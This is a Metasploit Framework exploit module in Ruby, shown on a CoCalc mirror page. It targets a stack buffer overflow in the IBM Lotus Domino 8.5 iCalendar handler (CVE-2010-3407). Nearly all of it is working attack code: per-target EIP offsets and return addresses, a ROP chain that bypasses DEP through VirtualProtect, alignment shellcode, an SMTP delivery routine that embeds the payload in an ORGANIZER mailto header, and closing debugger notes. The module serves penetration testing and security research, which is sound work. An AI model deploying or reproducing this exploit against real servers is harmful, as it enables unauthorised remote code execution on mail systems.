CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",

14
      'Description'    => %q{

15
          This module exploits a vulnerability found in IBM Lotus Domino iCalendar.  By

16
        sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"

17
        crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to

18
        gain arbitrary code execution.

19


20
        Note: In order to trigger the vulnerable code path, a valid Domino mailbox account

21
        is needed.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>

25
        [

26
          'A. Plaskett',  #Initial discovery, poc

27
          'sinn3r'        #Metasploit

28
        ],

29
      'References'     =>

30
        [

31
          [ 'CVE', '2010-3407' ],

32
          [ 'OSVDB', '68040' ],

33
          [ 'ZDI', '10-177' ],

34
          [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],

35
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]

36
        ],

37
      'Payload'        =>

38
        {

39
          'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"),

40
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

41
          'EncoderOptions' => {'BufferRegister'=>'ECX'},

42
          'StackAdjustment' => -3500

43
        },

44
      'DefaultOptions' =>

45
        {

46
          'EXITFUNC' => "process",

47
        },

48
      'Platform'       => 'win',

49
      'Targets'        =>

50
        [

51
          [

52
            'Lotus Domino 8.5 on Windows 2000 SP4',

53
            {

54
              'Offset'    => 2374,           #Offset to EIP

55
              'Ret'       => 0x6030582B,     #JMP ECX

56
              'MaxBuffer' => 9010            #Total buffer size

57
            }

58
          ],

59
          [

60
            'Lotus Domino 8.5 on Windows Server 2003 SP0',

61
            {

62
              'Offset'    => 2374,           #Offset to EIP

63
              'Ret'       => 0x6030582B,     #JMP ECX (Domino\\nnotes.dll)

64
              'MaxBuffer' => 9010            #Total buffer size

65
            }

66
          ],

67
          [

68
            'Lotus Domino 8.5 on Windows Server 2003 SP2',

69
            {

70
              'Offset'    => 2374,           #Offset to EIP

71
              'Ret'       => 0x604C4222,     #ADD AL,0x5E ; RETN

72
              'EAX'       => 0x7C35287F,     #Initial CALL VirtualProtect addr to align (MSVCR71.dll)

73
              'EaxOffset' => 2342,           #Offset to EAX

74
              'RopOffset' => 24,             #Offset to ROP gadgets

75
              'MaxBuffer' => 9010            #Total buffer size

76
            }

77
          ],

78
        ],

79
      'DisclosureDate' => '2010-09-14',

80
      'DefaultTarget'  => 2))

81


82
      register_options(

83
        [

84
          Opt::RPORT(25),

85
          OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),

86
          OptString.new('MAILTO',   [true, 'Valid Lotus Domino mailbox account', ''])

87
        ])

88
  end

89


90
  def check

91
    connect

92
    banner = (sock.get_once(-1,5) || '').chomp

93
    disconnect

94


95
    if banner =~ /Lotus Domino Release 8\.5/

96
      return Exploit::CheckCode::Appears

97
    else

98
      return Exploit::CheckCode::Safe

99
    end

100
  end

101


102
  def exploit

103
    sploit = ''

104
    if target.name =~ /Windows 2000 SP4/

105


106
      sploit << rand_text_alpha(934)

107
      sploit << payload.encoded

108
      sploit << rand_text_alpha((target['Offset']-sploit.length))

109
      sploit << [target.ret].pack('V')

110
      sploit << rand_text_alpha((target['MaxBuffer']-sploit.length))

111


112
    elsif target.name =~ /Server 2003 SP0/

113


114
      sploit << rand_text_alpha(930)

115
      sploit << payload.encoded

116
      sploit << rand_text_alpha((target['Offset']-sploit.length))

117
      sploit << [target.ret].pack('V')

118
      sploit << rand_text_alpha((target['MaxBuffer']-sploit.length))

119


120
    elsif target.name =~ /Server 2003 SP2/

121


122
      #Borrow a "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP

123
      #shellcode max = 1312 bytes

124
      rop_gadgets =

125
      [

126
        #EAX should be aligned to CALL VirtualProtect at this point

127
        0x604F5728,  #MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)

128
        #Set shellcode address

129
        0x6247282B,  #MOV EAX,ECX; RETN (nlsccstr.dll)

130
        0x62454F32,  #ADD AL,2B; RETN (nlsccstr.dll)

131
        0x603F7B38,  #ADD AL,31; RETN (nnotes.dll)

132
        0x624B7040,  #MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)

133
        #Set RETN value

134
        0x60577B7A,  #XCHG EAX,EDX; RETN (nnotes.dll)

135
        0x62452E35,  #MOV EAX,ECX; RETN (nlsccstr.dll)

136
        0x60606F4E,  #ADD AL,5D; RETN (nlsccstr.dll)

137
        0x603E6260,  #DEC EAX; RETN (nnotes.dll)

138
        0x603E6260,  #DEC EAX; RETN (nnotes.dll)

139
        0x603E6260,  #DEC EAX; RETN (nnotes.dll)

140
        0x603E6260,  #DEC EAX; RETN (nnotes.dll)

141
        0x603E6260,  #DEC EAX; RETN (nnotes.dll)

142
        0x7C3A4C72,  #MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)

143
        0x6247282B,  #MOV EAX,ECX; RETN (nlsccstr.dll)

144
        0x60253B6D,  #XCHG EAX,EBP; RETN (nnotes.dll)

145
        #Set Size (0x413)

146
        0x605A4B30,  #MOV EAX,205; RETN (nnotes.dll)

147
        0x605A4B30,  #MOV EAX,205; RETN (nnotes.dll)

148
        0x60592A36,  #ADD EAX,107; RETN (nnotes.dll)

149
        0x603B4C27,  #ADD AL,2B; RETN (nnotes.dll)

150
        0x624B7044,  #MOV DWORD PTR DS:[ECX+8],EAX; RETN

151
        0x604C5225,  #XOR EAX, EAX; RETN

152
        #newProtect

153
        0x60386C3C,  #MOV AL,3B; RETN (nnotes.dll)

154
        0x624D4C27,  #INC EAX; RETN (nlsccstr.dll)

155
        0x624D4C27,  #INC EAX; RETN (nlsccstr.dll)

156
        0x624D4C27,  #INC EAX; RETN (nlsccstr.dll)

157
        0x624D4C27,  #INC EAX; RETN (nlsccstr.dll)

158
        0x624D4C27,  #INC EAX; RETN (nlsccstr.dll)

159
        0x624B7048,  #MOV DWORD PTR DS:[ECX+C],EAX; RETN

160
        #oldProtect

161
        0x602B7353,  #MOV EAX,ESI; POP ESI; RETN (nnotes.dll)

162
        0x41414141,  #ESI

163
        0x624B704C,  #MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)

164
        #Call VirtualProtect

165
        0x6247282B,  #MOV EAX,ECX; RETN (nlsccstr.dll)

166
        0x60276256,  #XCHG EAX,ESP; RETN (nnotes.dll)

167
      ].pack("V*")

168


169
      align  = "\x51"      #PUSH ECX

170
      align << "\x58"      #POP EAX

171
      align << "\x34\x43"  #XOR AL,43

172
      align << "\x40"      #INC EAX

173
      align << "\x34\x65"  #XOR AL,65

174
      align << "\x50"      #PUSH EAX

175
      align << "\x59"      #POP ECX

176


177
      sploit << rand_text_alpha(1022)

178
      sploit << align

179
      sploit << payload.encoded

180
      sploit << rand_text_alpha((target['EaxOffset']-sploit.length))

181
      sploit << [target['EAX']].pack('V')

182
      sploit << rand_text_alpha((target['Offset']-sploit.length))

183
      sploit << [target.ret].pack('V')

184
      sploit << rand_text_alpha((target['RopOffset']))

185
      sploit << rop_gadgets

186
      sploit << rand_text_alpha((target['MaxBuffer']-sploit.length))

187


188
    end

189


190
    fname   = rand_text_alpha(4)

191
    prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)

192
    uid     = rand_text_alpha_upper(15)

193
    summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)

194
    status  = rand_text_alpha_upper(4)

195


196
    body  = "Content-Type: text/calendar; method=COUNTER; charset=UTF-8\r\n"

197
    body << "#{fname}.txt\r\n"

198
    body << "MIME-Version: 1.0\r\n"

199
    body << "Content-Transfer-Encoding: 8bit\r\n"

200
    body << "BEGIN:VCALENDAR\r\n"

201
    body << "METHOD:COUNTER\r\n"

202
    body << "PRODID:-//#{prod_id}//\r\n"

203
    body << "VERSION:2.0\r\n"

204
    body << "BEGIN:VEVENT\r\n"

205
    body << "UID:#{uid}\r\n"

206
    body << "SEQ:2\r\n"

207
    body << "RRULE:aaaa\r\n"

208
    body << "ORGANIZER:mailto:H@#{sploit}.com\r\n"

209
    body << "ATTENDEE;:Mailto:#{datastore['MAILTO']}\r\n"

210
    body << "SUMMARY:#{summary}\r\n"

211
    body << "DTSTART:20091130T093000Z\r\n"

212
    body << "DTEND:20091130T093000Z\r\n"

213
    body << "DTSTAMP:20091130T083147Z\r\n"

214
    body << "LOCATION:Location\r\n"

215
    body << "STATUS:#{status}\r\n"

216
    body << "END:VEVENT\r\n"

217
    body << "END:VCALENDAR\r\n"

218
    body << "\r\n.\r\n"

219


220
    commands =

221
    {

222
      :HELO => "HELO localhost\r\n",

223
      :FROM => "MAIL FROM: <#{datastore['MAILFROM']}>\r\n",

224
      :RCPT => "RCPT TO: <#{datastore['MAILTO']}>\r\n",

225
      :DATA => "DATA\r\n",

226
      :MESG => body,

227
      :QUIT => "QUIT\r\n",

228
    }

229


230
    print_status("Trying target #{target.name}")

231


232
    connect

233


234
    # Get SMTP Banner

235
    res = (sock.get_once || '').chomp

236
    print_status("Banner: #{res}")

237


238
    # Check banner before trying the exploit

239
    if res !~ /Lotus Domino Release 8.5/

240
      print_error("Remote service does not seem to be Lotus Domino 8.5")

241
      disconnect

242
      return

243
    end

244


245
    # Send HELO

246
    sock.put(commands[:HELO])

247
    res = sock.get_once || ''

248
    print_status("Received: #{res.chomp}")

249


250
    # Set MAIL FROM

251
    sock.put(commands[:FROM])

252
    res = sock.get_once || ''

253
    print_status("Received: #{res.chomp}")

254


255
    # Set RCPT

256
    sock.put(commands[:RCPT])

257
    res = sock.get_once || ''

258
    print_status("Received: #{res.chomp}")

259


260
    # Set DATA

261
    sock.put(commands[:DATA])

262
    res = sock.get_once || ''

263
    print_status("Received: #{res.chomp}")

264


265
    # Send malicious data

266
    sock.put(commands[:MESG])

267
    res = sock.get_once

268


269
    # QUIT

270
    sock.put(commands[:QUIT])

271
    res = sock.get_once || ''

272
    print_status("Received: #{res.chomp}")

273


274
    handler

275
    disconnect

276
  end

277
end

278


279


280
=begin

281
0:008> r

282
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014

283
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0         nv up ei pl nz na pe nc

284
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206

285
42424242 ??              ???

286
0:008> !exchain

287
08daea2c: nRouter+511bb (004511bb)

288
08daffdc: kernel32!_except_handler3+0 (77e70abc)

289
  CRT scope  0, filter: kernel32!BaseThreadStart+3a (77e4a92d)

290
                func:   kernel32!BaseThreadStart+4b (77e4a943)

291
Invalid exception stack at ffffffff

292
0:008> k

293
ChildEBP RetAddr

294
WARNING: Frame IP not in any known module. Following frames may be wrong.

295
08da9cbc 43434343 0x42424242

296
08da9cc0 43434343 0x43434343

297
...

298
0:008> bl

299
 0 e 602738f9     0001 (0001)  0:**** nnotes!MailCheck821Address+0xb09

300
0:008> u 602738f9

301
nnotes!MailCheck821Address+0xb09:

302
602738f9 e80239d9ff      call    nnotes!Cstrcpy (60007200)

303
602738fe eb02            jmp     nnotes!MailCheck821Address+0xb12 (60273902)

304
60273900 33ff            xor     edi,edi

305
60273902 8d8dc0faffff    lea     ecx,[ebp-540h]

306
60273908 51              push    ecx

307
60273909 8d95bcf6ffff    lea     edx,[ebp-944h]

308
6027390f 52              push    edx

309
60273910 e8eb38d9ff      call    nnotes!Cstrcpy (60007200)

310


311
Badchars:

312
0x01=0x0F21, 0x02=0x0f22,  0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25,  0x06=0x0f26, 0x07=0x0f27

313
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e  0x0f=0x0f2f,

314
0x10=0x0f30, 0x11=0x0f31,  0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34,  0x15=0x0f35, 0x16=0x0f36,

315
0x17=0x0f37, 0x18=0x0f38,  0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c,  0x1d=0x0f3d, 0x1e=0x0f3e,

316
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""

317
=end

318


319